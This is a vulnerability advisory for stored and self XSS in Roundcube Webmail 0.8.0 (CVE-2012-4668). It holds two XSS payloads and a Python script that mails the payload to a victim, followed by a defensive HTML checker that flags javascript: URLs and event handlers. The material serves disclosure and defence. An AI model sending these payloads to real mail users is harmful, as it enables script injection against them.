Roundcube Webmail 0.8.0 Stored XSS Exploit

Summary

Roundcube Webmail Version 0.8.0 suffers from a stored XSS vulnerability.

Credit:

The information has been provided by dun.


Details

Vulnerable Systems:
 * Roundcube Webmail Version 0.8.0

1. Stored XSS in e-mail body.

XSS Payload: <a href=javascript:alert('XSS')>POC MAIL</a>

Send an email to the victim with the payload in the email body. Once the user clicks on the URL, the XSS should be triggered.

2. Self XSS in e-mail body (Signature).

XSS Payload: '><img src='1.jpg'onerror=javascript:alert('XSS')>

In order to trigger this XSS you should insert the payload into your signature.

Settings -> Identities -> Your Identity -> Signature
Now create a new mail; the XSS should be triggered.


import smtplib

print('###############################################')
print('# Roundcube 0.8.0 Stored XSS POC #')
print('# Coded by: Shai rod #')
print('# @NightRang3r #')
print('# http://exploit.co.il #')
print('# For Educational Purposes Only! #')
print('###############################################\r\n')

# SETTINGS

sender = 'attacker@localhost'
smtp_login = sender
smtp_password = 'qwe123'
recipient = 'victim@localhost'
smtp_server = '192.168.1.10'
smtp_port = 25
subject = 'Roundcube Webmail XSS POC'

# SEND E-MAIL

print('[*] Sending E-mail to ' + recipient + '...')
# recipient is a single address string, so it goes into the To: header as-is.
msg = ('From: %s\r\nTo: %s\r\nSubject: %s\n'
       % (sender, recipient, subject))
# The blank line after Content-type ends the headers; the HTML body follows.
msg += 'Content-type: text/html\n\n'
msg += '''<a href=javascript:alert('XSS')>Click Me, Please...</a>\r\n'''
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
server.sendmail(sender, recipient, msg)
server.quit()
print('[+] E-mail sent!')
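
A defender-side check for the two payloads described above, as an added example that is not part of the original advisory or of Roundcube's code: it parses an HTML mail body and reports URL attributes whose scheme falls outside an allowlist, plus inline event-handler attributes. The allowlist, the attribute set and all function names are assumptions of this example.

```python
import re
from html.parser import HTMLParser

# Assumed policy for this example: schemes a mail viewer may leave clickable.
ALLOWED_SCHEMES = {"http", "https", "mailto", "cid"}
URL_ATTRS = {"href", "src", "action", "background", "formaction", "poster"}
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")
LEADING_JUNK = "".join(map(chr, range(0x21)))  # C0 controls and space


def url_scheme(value):
    """Return the scheme a browser would see, or None for a relative URL."""
    # Browsers drop tab/CR/LF anywhere in a URL and ignore leading control
    # characters and spaces, so normalise the value before matching.
    cleaned = re.sub(r"[\t\r\n]", "", value).lstrip(LEADING_JUNK)
    match = SCHEME_RE.match(cleaned.lower())
    return match.group(1) if match else None


class MailBodyAuditor(HTMLParser):
    """Collect (tag, attribute, reason) for markup that can run script."""

    def __init__(self):
        # convert_charrefs=True: entity-encoded values are decoded first.
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append((tag, name, "event handler"))
            elif name in URL_ATTRS and value is not None:
                scheme = url_scheme(value)
                if scheme is not None and scheme not in ALLOWED_SCHEMES:
                    self.findings.append((tag, name, "scheme " + scheme))


def audit_html_body(html):
    auditor = MailBodyAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed samples: the advisory's two payloads and a benign body.
LINK_PAYLOAD = "<a href=javascript:alert('XSS')>POC MAIL</a>"
SIGNATURE_PAYLOAD = "'><img src='1.jpg'onerror=javascript:alert('XSS')>"
BENIGN = '<a href="https://example.org/">ok</a> <img src="logo.png">'

if __name__ == "__main__":
    for sample in (LINK_PAYLOAD, SIGNATURE_PAYLOAD, BENIGN):
        print(audit_html_body(sample))
```

A non-empty result means the body should have the reported attribute removed or neutralised before it is rendered in the mail view or the compose editor.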

CVE Information:
2012-4668

Disclosure Timeline:
Published: 2012-08-17
